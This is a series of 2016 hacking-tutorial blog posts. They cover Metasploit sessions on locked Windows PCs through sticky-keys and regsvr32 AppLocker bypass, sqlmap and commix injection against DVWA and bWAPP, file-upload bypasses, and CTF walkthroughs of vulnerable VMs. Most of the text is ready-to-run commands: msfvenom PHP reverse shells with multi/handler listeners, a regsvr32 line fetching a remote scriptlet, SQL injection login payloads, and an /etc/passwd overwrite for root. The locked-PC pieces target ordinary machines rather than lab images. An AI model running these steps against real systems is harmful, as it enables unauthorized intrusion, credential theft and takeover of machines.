Hack Lock PC in Network using Metasploit

November 29, 2016, 11:13 pm

≫ Next: Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

≪ Previous: Hack the Billy Madison VM (CTF Challenge)

Today we will discover how to take Meterpreter session of a pc in a network which is switched on but is locked.

Let us assume that our victim’s pc already has sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You will need physical access to the victim’s pc for this attack. Press the “shift” key 5 times on the victim’s pc to bring up the command prompt.

Next, we run metasploit on our own pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Take down the command generated by metasploit and run it on the victim pc’s command prompt

Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll

Voila, we have the session of victim’s pc on our meterpreter.

↧

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

November 30, 2016, 4:54 am

≫ Next: SQL Injection Exploitation in DVWA (Bypass All Security)

≪ Previous: Hack Lock PC in Network using Metasploit

Lets learn how to take Meterpreter session of a pc in a network which is switched on but is locked and has remote desktop feature enabled on it.

Let us assume that our victim’s pc already has utilman attack or sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys .

You donot need physical access to the victim’s pc for this attack.

First, run metasploit on your pc.

$msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server and use the exploit followed by setting the payload, lhost, lport and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim’s pc and enter the victim’s ip.

$rdesktop 192.168.0.103

You get the remote desktop of the victim’s pc.

Press the “shift” key 5 times to bring up the command prompt.

And returning to our previous terminal with meterpreter, we have finally got the session of victim’s pc on out terminal.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. Contact here

↧

SQL Injection Exploitation in DVWA (Bypass All Security)

November 30, 2016, 7:31 am

≫ Next: Hack the Necromancer VM (CTF Challenge)

≪ Previous: Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

www.owasp.org/index.php/SQL_Injection

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

From the list of vulnerability select SQL Injection for your attack. Type user ID: 1 in text box. Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.

Turn on burp suite in kali Linux click on proxy in menu bar and go for intercept is on button. Come to back and click on submit button in browser. The Intercept button is used to display HTTP and Web Sockets messages that pass between your browser and web servers.Copy the complete detail of intercept; past on leafpad; save on desktop as 1.

Open terminal and type following command for SQL injection attack using Sqlmap.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump all --os-shell

sqlmap is an open source penetration testing tool that self-regulates the process of detecting and exploiting SQL injection vulnerabilitiesand taking over of database servers. -r is used for recursions which will analysis your intercepted data from path/root/Desktop/1.

Things that to be notice is I have used –dbsin above command which fetched all database names as you can see in below image. Then it will ask to store hashes in temporary file type y and hit enter.

Now next it extracts table: user for database DVWA which I have mentioned in above command as –D dvwa.

Grateful we have penetrated the user table successfully. Please have a look over fetched data you will find that it dumpslogin-ID for user; fail login; user first name; user last name; hash password.

Table: guestbookfor database DVWA which having only 1 entry.

Now this tool is going to use a web backdoor for command prompt where it will ask to choose language for backdoor

Type 4 and hit enter.

Afterwards it will ask to choose any options for location for writable directory.

Type 1 and hit enter.

You can see the backdoor has been successfully uploaded on destination folder. Type y for retrieved the command standard output. Now I am inside the os-shell which I have mentioned in above command as os-shell.

Os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level Medium

From the list of vulnerability select SQL Injection for your attack. Select user ID: 2 from list. Set proxy turn on intercept tab in burp suite and come back to web browser for submit.

Follow the same process save the selected detail fetched by intercept on the desktop as file: 2.

Now security level is increased so I was unable to get os-shell but successful received all detail of database by typing following command on terminal.

sqlmap -r /root/Desktop/2 --dbs -D dvwa --dump all

Again I have got all database namesincluding dvwa. Now again type y for further process.

Table: userfor database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbookfor database DVWA which having only 1 entry.

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

Here you find different scenario when you will select SQL Injection don’t get panic follow the step carefully this level is as similar as low level security. For hint the developer told that he had redirect the submit user ID to another page through POST action.

Click on link here to change your ID which will redirect to new window type ID: 1turn on intercept then comes back and clicks on submit.

Now compare the intercepted data of both levels high and low you will find that POST action is use in high security as well as GET action is used in low security level. Copy the complete data and make following change in it. For help please look at below images.

Past the copied data to a leafpad replace POST from GET and add /?id=1&Submit=Submit save your file:third on desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Here go with flow!!!

Same process as above and this time again I will try for os-shell.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump all --os-shell

Again I have got all database names including dvwa. Now again type y for further process.

Table: userfor database DVWA It has dumped again same login-ID for user; fail login; user first name; user last name; hash password.

Table: guestbookfor database DVWA which having only 1 entry.

Oops!! Fail to get os-shell but we have retrieve database of dvwa under high security.

↧

Hack the Necromancer VM (CTF Challenge)

December 1, 2016, 11:28 pm

≫ Next: Powershell Injection Attacks using Commix and Magic Unicorn

≪ Previous: SQL Injection Exploitation in DVWA (Bypass All Security)

The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!

You can download necromancer from here let’s get going. Firstly, we run netdiscover

Netdiscover

Our next step is nmap.

nmap -A -p- 192.168.0.110

The scan takes a bit time and gives us nothing. So, let’s try a UDP scan using nmap.

nmap -sU -T4 -p- 192.168.0.110

We get a UDP port 666 open. Lets try netcat on it.

nc -nvu 192.168.0.110 666

No matter how many times we hit enter, we get the same reply- “You gasp for air! Time is running out!”

When we tried running the machine (necromancer), we had a message regarding the IP - “Renewal in 3600 seconds”. This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

tcpdump host 192.168.0.110

We get to know about some gateway 4444. This can be another port on our target. Lets use netcat once again.

nc -nvlp 4444

And we get a text dump in return. It has capital characters, small characters and numbers as well. This has to be a base64 encoded text. We decode it at www.asciitohex.com and get some sensible text.

Ok. We have our 1st flag. And a message to chant the flag’s string at UDP port 666. The flag1 text seems to be a md5 hash so we decrypt it at www.hashkiller.co.uk . It decrypts to “opensesame”. Let’s return to our port 666 using netcat and type in this string there.

nc -nvu 192.168.0.110

opensesame

Another hint. Numeral 80 reminds us ofport 80 used for http. Let’s fire up the victim machine’s IP to our browser on port 80.

Nothing useful except an image. Let’s download it and try to analyse it using binwalk

binwalk /root/Desktop/pileoffeathers.jpg

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a txt file named feathers.txt which again contains a base64 text. We it and get our 3rd flag along with a clue /amagicbridgeappearsatthechasm. Seems like a directory decode.

Opening the directory in our browser, we are greeted by another web-page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the necromancer’s spell. We google for “magic items wiki” and find some good stuff on the very first link. But what next?

We decide to make a custom dictionary with all the words on this wiki page. We will use cewl for this.

cewlhttps://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt –v

This makes a dictionary of magical items on our desktop. Let us try dirb to get our next clue.

dirb http://192.168.0.110/amagicbridgeappearsatthechasm -w /root/Desktop/magicitems.txt

We get another directory as” result. “talisman

When we visit the url now using talisman, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running

chmod 777 /root/Desktop/talisman

Thereafter we run the file by going to its location.

./talisman

No matter what we answer to the asked question –“Do you want to wear the talisman?”, the result is the same –“Nothing happens”. So lets try to debug the binary file.

gdb /root/Desktop/talisman

Get some info about the functions-

info functions

Create a break point at wearTalisman because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell

jump chantToBreakSpell

Yess. We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag’s words at UDP port 31337.

Now the words appear to be in md5 hash and upon decrypting it we get – “blackmagic” We now use netcat to connect to port 31337 and type in “blackmagic” there.

nc -unv 192.168.0.110 31337

blackmagic

And we get another directory along with our 5th flag. We open the directory with our victim’s IP

Another webpage with a hint to see the UDP port 161(used for snmp) and a close look reveals that the word "necromancer" just before the image is actually a link. Upon clicking it we get another file to download named “necromancer”. We download and unzip it. It contains a cap file named necromancer. upon analyzing this file with wireshark, we discover that 802.11 protocol is being used. This indicates that the file is a wireless data cap file so let’s try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. use it with port 161 i.e. snmp.

snmpwalk-c death2all -v 1 192.168.0.110

It says that the door is locked.

Let’s try to unlock it using snmpset.

snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked

When the string changes to “Unlocked”, we run our previous command once again

snmpwalk -c death2all -v 1 192.168.0.110

Voila!! The door unlocks and we get another flag along with a clue i.e. TCP port 22 (used for ssh) . flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22. Another md5 hash that decrypts to “demonslayer”.

We try to login to port 22 assuming "demonslayer" to be the password but fail.

ssh 192.168.0.110

demonslayer

This means that "demonslayer" should be the username for ssh. To crack the password, we will use metasploit along with rockyou.txt dictionary. Open a terminal for metasploit.

Search ssh_login

Thereafter we run the following commands:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.110

set username demonslayer

set pass_file /usr/share/wordlists/rockyou.txt

run

We get password as 12345678 and a shell as well.

But neither ls nor dir seems to be working on this shell.

So, we login to ssh via terminal on host using demonslayer/12345678

ssh demonslayer@192.168.0.110

12345678

Using ls -la we discover that there lies a flag8.txt file in the directory. To read its contents we use

cat flag8.txt

We get another hint regarding udp port 777. This does not works on our pc. So let us try on the victim's shell.

nc -u localhost 777

and hit entertwice

So the necromancer is now trying to play a game with us. upon googling for his question “Where do the Black Robes practice magic of the Greater Path?” We get the answer. its Kelewan.

Our 8th flag is here.flag8{55a6af2ca3fee9f2fef81d20743bda2c} and another question as well that asks, “Who did Johann Faust VIII make a deal with?” Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

And we get the next flag and yet another question “Who is tricked into passing the Ninth Gate?” Google comes in handy again and tells us the answer once more. The next answer is Hedge

And our next flag awaits us. flag10{8dc6486d2c63cafcdc6efbba2be98ee4} nothing more to be noticed here. But if I am not wrong, we did see this "small vile" thing somewhere earlier. Let’s head back by cntrl+c and try to look for it.

We type in ls -la and yes it’s there ".smallvile" about which we just discovered in the description alongwith our 10th flag. Let’s open it using cat.

cat .smallvile

Hope this opened up some gates cause we don’t see any clue here. Let’s try sudo.

sudo –l

Seems to be working. It shows us the location of our 11th flag and that the flag11.txt file is not protected by any sort of password. Let’s try to open it.

sudo /bin/cat /root/flag11.txt

Wohoo!! Mission Accomplished. The last flag has been captured

Researcher and Author:Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here.

↧

Powershell Injection Attacks using Commix and Magic Unicorn

December 2, 2016, 6:50 am

≫ Next: Hack the Hackday Albania VM (CTF Challenge)

≪ Previous: Hack the Necromancer VM (CTF Challenge)

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install bWAPP lab in your XAMPP or WAMP server, for this you can visit the link web Pentest lab setup using bwapp here.

Our task is to get meterpreter shell through os command injection-Blind attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

My task is to bypass all three security level in bWAPP through os command injection.

Let start!!!!

Set the security level low, from list box choose your bug select os command injection-Blind now and click on hack.

Type your IP in the text field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

To capture the cookie of bWAPP click on proxytag then click to inception is on button, come back to bWAPP and now click to PING button.

Look at image you will find that I have got the details.

Open the terminal in kali Linux and type the commix command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command

commix --url="http://192.168.1.101:81/bWAPP/commandi_blind.php" --data="target=target=192.168.1.101&form=submit" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Commix found the target seems injectable via blind injection techniques and will further ask for pseudo terminal.

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Option asks by commix to set backdoor for connection Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type '7' to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) >2

Above step will geneterate a shellcode marked above in the image copy the whole shellcode “msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc” and paste in new terminal which will start multi handler by its own.

Once metasploit framework gets loaded and starts the payload handler; come back to your previous terminal and press enter. As it is mention in image.

Luckly!! We succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

Same task we going to perform with same process but with another type of vulnerability. Set the security level low, from list box choose your bug select os command injection now and click on hack.

Type your IP in the DNS lookup field and just after that start the burp suite and set manual proxy of browser. Click on proxytag then click to inception is on button, come back to bWAPP and now click to Lookup.

Open the terminal in kali Linux and type the commix command.

commix --url="http://192.168.1.101:81/bWAPP/commandi.php" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7" --data="target=192.168.1.101&form=submit"

Type ‘y’ to resumed the classic injection point and to pseudo terminal shell

Here we got the commix os shell but our aim is meterpreter shell for that we need to type following commands.

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Option asks by commix to set backdoor for connection Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Option asks by commix to set payload Type '7' to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) >7

Option asks by commix to set powershell injection attack Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) >2

Once metasploit framework gets loaded and starts the payload handler come; back to your previous terminal and press enter. As it is mention in image.

Luckly!! Again we succeeded in our task we have got meterpreter shell.

Meterpreter>sysinfo

↧

Hack the Hackday Albania VM (CTF Challenge)

December 5, 2016, 9:27 am

≫ Next: Database Penetration Testing using Sqlmap

≪ Previous: Powershell Injection Attacks using Commix and Magic Unicorn

This was used in HackDay Albania's 2016 CTF. It uses DHCP.

Note: VMware users may have issues with the network interface doing down by default. You are recommended to use Virtualbox.

Download the lab from: https://www.vulnhub.com/entry/hackday-albania,167/

Let’s begin. First we run netdiscover(as usual).

netdiscover

Next we run nmap

nmap -p- A 192.168.0.103

Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting http://192.168.0.103:8008

The message in the box translates to- “if I am, I know where to go :)”

We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here :)”

Next we run nikto on our target

nikto -h 192.168.0.103:8008

Upon discovering the existence of robots.txt, we open it up on our browser

http://192.168.0.103:8008/robots.txt

All but one directory give us the same result.

The directory that proves to be worth visiting is http://192.168.0.103:8008/unisxcudkqjydw/

So, we discover another useful directory. Lets head towards it

http://192.168.0.103:8008/unisxcudkqjydw/vulnbank/

Clicking on the client/ directory, we are greeted by a login page of very secure bank

Upon trying a single ‘as the username, we get an error page.

After trying multiple credentials, we finally succeed in logging in as the first user

‘ or ‘a’ = ‘a’ --

On the welcome page, we can find an option to upload a file. Let us create a php payload using msfvenom and try uploading it.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

We copy the php code and save it on a leafpad and save it in the name ra.php We try to upload the file but the webpage displays an error- “After we got hackedwe are allowing only image filesto upload such as jpg,jpeg, bmp etc…” Let’s rename our file to ra.jpg and try uploading it again.

Start the msf handler.

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Now we click on view ticket option under ra.jpg on our browser

And we have our meterpreter session. To get a proper shell and reach the tmp folder and find the os release, we fire up the following commands:

shell

python3 -c ‘import pty; pty.spawn(“/bin/bash”);’

cd /tmp

lsb_release -a

Kernel exploits do not seem to work here since gcc is not installed on our target machine. So, we decide to go the other way. We download a shell called LinEnum.sh from github on another terminal using-

git clone https://github.com/rebootuser/LinEnum.git

Thereafter we start apache service on our machine

service apache2 start

Thereafter, we copy the LinEnum.sh file to var/www/html folder of our machine and returning to our victim’s shell, we upload the file to his tmp folder

wget http://192.168.1.106/LinEnum.sh

Thereafter, change the permission of the uploaded file and run it.

chmod 777 LinEnum.sh

./LinEnum.sh

We discover that etc/passwd folder is writable.

And the encryption used by our victim’s machine is SHA512

We open the victim’s password file on the terminal itself

cat /etc/passwd

We then copy the entire contents of the file and copy it to a leafpad and name it as passwd. To know more about etc/passwd, please visit https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/ or https://www.digitalocean.com/community/tutorials/how-to-use-passwd-and-adduser-to-manage-passwords-on-a-linux-vps

Thereafter on another terminal, we generate a SHA512 encryption for a password “raj”

python -c 'import crypt; print crypt.crypt("raj", "$6$saltsalt$")'

We now copy this hash and replace it with the ‘x’ in the last line of our passwd file which we just saved in leafpad.

Next, we place this file named passwd in the var/www/html folder of our machine and upload it to the victim’s tmp folder

wget http://192.168.0.106/passwd

Now copy and replace this file with the passwd file present inside the etc folder.

cp passwd /etc/passwd

Then we try logging in with the user taviso

su taviso

raj

Next we try the root’s login

sudo -i

raj

Success. Now list the contents

here’s our flag. Read its contents using

cat flag.txt

↧

Database Penetration Testing using Sqlmap

December 6, 2016, 9:37 am

≫ Next: Hack the Freshly VM (CTF Challenge)

≪ Previous: Hack the Hackday Albania VM (CTF Challenge)

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Ø Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

Ø Enumerate users, password hashes, privileges, roles, databases, tables and columns.

Ø Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.

Ø Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.

Ø Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

For more details visit their official site sqlmap.org

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from herenow open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u "http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43" --dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!! We got the shell.

os-shell> net users

↧

Hack the Freshly VM (CTF Challenge)

December 8, 2016, 8:09 am

≫ Next: Hack File upload Vulnerability in DVWA (Bypass All Security)

≪ Previous: Database Penetration Testing using Sqlmap

Here we come with a new article which will all be about a penetration testing challenge called FRESHLY. The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. It’s an easy lab… let’s get started with it and access it.

Download from here

https://www.vulnhub.com/?q=fresh&sort=date-asc&type=vm

So to start with it firstly we have to find out the IP of FRESHLY. For that type the netdiscover command in terminal of Kali. It will show each IP present in our network.

TARGET IP : 192.168.1.6

Now we have target IP so let’s scan it with aggressive scan (-A).

nmap -p- -A 192.168.1.6

This shows all open ports: 80, 8080, 443.

As we can see 80 port is open so we will open target IP in our browser to find out what’s in there as our next clue.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:

After scanning it shows that there is a login.php page found. So open it in a browser with target IP

As we can see there is a login form popped up as a result asking for user and password. So we will capture the cookies using burpsuite. I have given the entries for user as admin and password as 123. You can enter anything you like

I take these parameters and run sqlmap to see if there's SQLInjection vulnerability we will find it in its Database using sqlmap. And for this type:

Sqlmap –u “http://192.168.1.6/login.php” --data=”user=test&password=123&s=Submit” --risk 3 -- level 3 --dbs

We have our required database right in front of us. Using sql commands fetch username and password from that database ie wordpress8080

Alright we have achieved our first step by finding out user and password for wordpress.

User = admin

Password = SuperSecretPassword

Earlier we have already found out our open ports so use one of not used ports to open in browser ie.8080

Cool...See what you have got…. Now click on this link and you are all set for further result.

Candy goodness!!!!! It’s our wordpress page. So let’s get on to other step by opening wordpress login page and entering the credentials we found out i.e.

User= admin

Password= SuperSecretPassword

Once you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenomcommand:

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 –f raw

Side by side in other terminal open metasploit and run handler.

Use exploit/multi/handler

Set payload php/meterpreter/reverse_tcp

Set lhost 192.168.1.6

Set lport 4444

exploit

Again going back to our generated php raw file copy the code from to die().

As we want to read a file on the system, let's put some PHP code in the theme: We go to Appearance -> themes -> 404.php and add some PHP code in order to execute it,

But we are not done yet as the exploit will run it will give you the session of meterpreter. Furthermore type, shell

Now we need to import the python file to reach the terminal and to do so type:

echo "import pty; pty.spawn('/bin/bash')"> /tmp/asdf.py

python /tmp/asdf.py

Now there might the kernel version that we could exploit so to check its version type;

lsb_release –a

When we reload the index page we got the /etc/shadow file in the footer: We already got the flag! No need to root the system But how did you get root shell, you might ask: ) Here's the magic:

Account credential reuse from the Wordpress admin password SuperSecretPassword allowed su - to escalate privileges

Great!!!! You have achieved your goal. Though this was a easy challenge I hope it helped you to improve your skills.

↧

Hack File upload Vulnerability in DVWA (Bypass All Security)

December 12, 2016, 3:53 am

≫ Next: FTP Service Exploitation in Metasploitable 3

≪ Previous: Hack the Freshly VM (CTF Challenge)

File upload vulnerability are a major problem with web based applications. In many web server this vulnerability depend entirely on purpose that allows an attacker to upload a file hiding malicious code inside that can then be executed on the server. An attacker might be able to put a phishing page into the website or deface the website.

Attacker may reveal internal information of web server to other and some chances to sensitive data might be informal, by unauthorized people.

In DVWA the webpage allows user to upload an image, and the webpage go through with program coding and checks if the last characters of the file is '.jpg' or '.jpeg' or ’.png’ before allowing the image get uploaded in directory.

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, metasploit framework

Install DVWA lab in your XAMPP or WAMP server, read full article from here

Now open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and login with following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Copy and paste the highlighted code in leafnod and save as with PHP extension as hack.php on the desktop.

Come back to your DVWA lab and click to file upload option from vulnerability menu.

Now click to browse button to browse hack.phpfile to upload it on web server and clickon upload which will upload your file in directory of server.

After uploading a PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and past it in URL to execute it.

hackable/uploads/hack.php

Before executing this URL on browser start and run multi handlerin metasploit framework using below command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide you a meterpreter session 1.

192.168.1.102:81/DVWA/hackable/uploads/hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.104

msf exploit(handler) > set lport 3333

msf exploit(handler) > run

meterpreter > sysinfo

Bypass Medium Level Security

Click on DVWA Security and set Website Security Level medium

Same process to create php backdoor.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as raj.php.jpeg on desktop. Since this file will get upload in medium security which is little different from low security as this will apparently check the extension of file.

Come back to your DVWA lab and click to file uploadoption from vulnerability menu.

Again click to browse button to browse raj.php.jpegfile to upload it. Now start burp suit and make intercept on under proxy tab. Don’t forget to set manual proxy of your browser and click on upload.

Intercept tab will work to catch post method when you click to upload button. Now convert raj.php.jpeg into raj.php

Compare the change before uploading your PHP file. After altering click on forward to upload PHP file in directory

This will show the path of uploaded file of the directory where file is successfully uploaded.

hackable/uploads/raj.php

Now repeat the whole process same as in low security to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/raj.php

This’ll provide a meterpreter session 2 when you run URL in browser.

meterpreter > sysinfo

Bypass High Level Security

Click on DVWA Security and set Website Security Level High

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.104 lport=3333 -f raw

Now Save the selected code as shell.jpeg on desktop. Since this file will get upload in high security which is little different from low and medium security as this will apparently check the extension of file as well as piece of code also therefore type GIF98before PHP code and save as shell.jpeg.

Repeat the process to browse shell.jpeg

Again you will directory path of uploaded file.

This PHP file cannot directly execute on URL as it uploaded with jpeg extension. For rename this file into PHP file click to command injection option from vulnerability. Here this vulnerability let you copy and rename this shell.jpeg into PHP file. Types following in text box which will copied and renameshell.jpeg into aa.php

|copy C:\xampp\htdocs\DVWA\hackable\uploads\shell.jpeg C:\xampp\htdocs\DVWA\hackable\uploads\aa.php

When you will submit the command the PHP file get copied with new name as aa.php

Now repeat the process to execute PHP file in URL.

192.168.1.102:81/DVWA/hackable/uploads/aa.php

Wonderful!! Here we get meterpreter session 3 also.

meterpreter > sysinfo

↧

FTP Service Exploitation in Metasploitable 3

December 12, 2016, 10:08 am

≫ Next: Hack Metasploitable 3 using Elasticsearch Exploit

≪ Previous: Hack File upload Vulnerability in DVWA (Bypass All Security)

